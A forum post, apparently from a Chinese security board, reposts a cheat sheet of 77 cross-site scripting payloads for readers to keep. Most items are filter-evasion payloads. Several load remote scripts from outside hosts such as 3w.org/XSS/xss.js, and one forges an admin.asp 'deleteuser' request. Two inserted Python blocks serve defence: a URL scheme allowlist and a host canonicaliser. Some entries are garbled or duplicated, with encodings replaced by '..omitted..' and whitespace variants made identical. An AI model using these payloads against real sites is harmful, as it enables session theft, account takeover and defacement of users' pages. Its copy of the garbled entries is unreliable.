It seems t00ls has fairly little material on XSS; I saw something good and copied it over, in case any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hexadecimal encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (requires being on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escape-filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
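Items (3)-(5), (11)-(14), (17)-(19) and (47) all depend on the browser decoding character references and skipping control and whitespace code points before it recognises the javascript: scheme, so a filter that looks for the literal string "javascript:" misses them. The check below is an added example, not code from this post or from the cheat sheet it copies: it decodes a URL attribute value the same way and then applies a scheme allowlist. The allowed set and the ignored code points (0-32, U+00A0, U+2000-U+200B, U+3000, U+FEFF, an assumed reading of the list in item (47)) are this example's own choices.

```python
import html
import re
from typing import Optional

# Code points a browser skips inside a URL before recognising the scheme.
# Assumed reading of item (47)'s list: 0-32, NBSP, U+2000-U+200B, U+3000, U+FEFF.
IGNORED_CODEPOINTS = set(range(0, 33)) | {0x00A0, 0x3000, 0xFEFF} | set(range(0x2000, 0x200C))

# Allowlist (this example's own choice): anything else, including javascript:,
# vbscript: and data:, is rejected without maintaining a blocklist of spellings.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

_SCHEME_RE = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")


def normalize_url_attr(value: str) -> str:
    """Decode a URL attribute the way a browser does before scheme detection:
    resolve HTML character references (html.unescape also accepts numeric
    references without a trailing semicolon, as in items (9)-(10)), then drop
    the ignored code points so 'jav\\tascript:' and 'java\\0script:' both
    read as 'javascript:'."""
    decoded = html.unescape(value)
    return "".join(ch for ch in decoded if ord(ch) not in IGNORED_CODEPOINTS)


def url_scheme(value: str) -> Optional[str]:
    """Scheme of the decoded value, lower-cased (item (4): case does not
    matter), or None for a relative URL such as '/path' or '//host/'."""
    m = _SCHEME_RE.match(normalize_url_attr(value))
    return m.group(1).lower() if m else None


def is_safe_url(value: str) -> bool:
    """Accept relative URLs and allowlisted schemes only."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    # Constructed samples in the shape of the post's items, not taken from it verbatim.
    samples = [
        "javascript:alert('XSS')",         # (3)
        "JaVaScRiPt:alert('XSS')",         # (4)
        "jav&#x09;ascript:alert('XSS')",   # (12) encoded tab
        "jav\nascript:alert('XSS')",       # (13) newline
        "java\0script:alert('XSS')",       # (17) null byte
        " \u00a0javascript:alert('XSS')",  # (19)/(47) leading space and NBSP
        "&#106avascript:alert('XSS')",     # (9) reference without semicolon
        "http://example.com/",             # allowed
        "//example.com/",                  # relative, allowed
    ]
    for s in samples:
        print("allow" if is_safe_url(s) else "BLOCK", repr(s))
```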
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can add the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded commands; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded commands 2 (a.jpg is on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Trailing dot (absolute DNS)
<A HREF="http://www.google.com./">XSS</A>
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
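Items (68)-(76) spell the same destination host in several ways: one 32-bit decimal integer, hexadecimal or octal components, a scheme-relative URL, and a trailing dot. A redirect or link allowlist that compares the raw string is bypassed by any of them. The canonicaliser below is an added example, not code from the post: it rewrites every inet_aton-style numeric host to dotted decimal and removes the trailing dot so that the comparison sees one spelling. The decimal, hex and octal values from items (70)-(72) serve as its inputs; the function names are chosen here.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

_PART_RE = re.compile(r"0[xX][0-9a-fA-F]*|[0-9]+")


def _parse_part(part: str) -> int:
    """One component as inet_aton reads it: 0x.. is hex, a leading 0 means octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def numeric_host_to_dotted(host: str) -> Optional[str]:
    """Dotted-decimal form of a numeric IPv4 host in any inet_aton notation
    (a single 32-bit integer, hex or octal parts, fewer than four parts), or
    None if `host` is not purely numeric or a part is out of range."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART_RE.fullmatch(p) for p in parts):
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:  # e.g. an octal part containing 8 or 9
        return None
    # Every part but the last is one byte; the last fills the remaining bytes.
    remaining = 4 - (len(values) - 1)
    if any(v > 0xFF for v in values[:-1]) or values[-1] >= 256 ** remaining:
        return None
    n = 0
    for v in values[:-1]:
        n = (n << 8) | v
    n = (n << (8 * remaining)) | values[-1]
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str) -> Optional[str]:
    """Host of `url` for allowlist comparison: scheme-relative '//host'
    accepted (item 74), lower-cased, trailing dot removed (item 76), numeric
    forms rewritten as dotted decimal (items 70-73)."""
    if url.startswith("//"):
        url = "http:" + url
    host = urlsplit(url).hostname  # .hostname is already lower-cased
    if not host:
        return None
    host = host.rstrip(".")
    return numeric_host_to_dotted(host) or host
```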
Original source: http://fuzzexp.org/u/0day/?p=14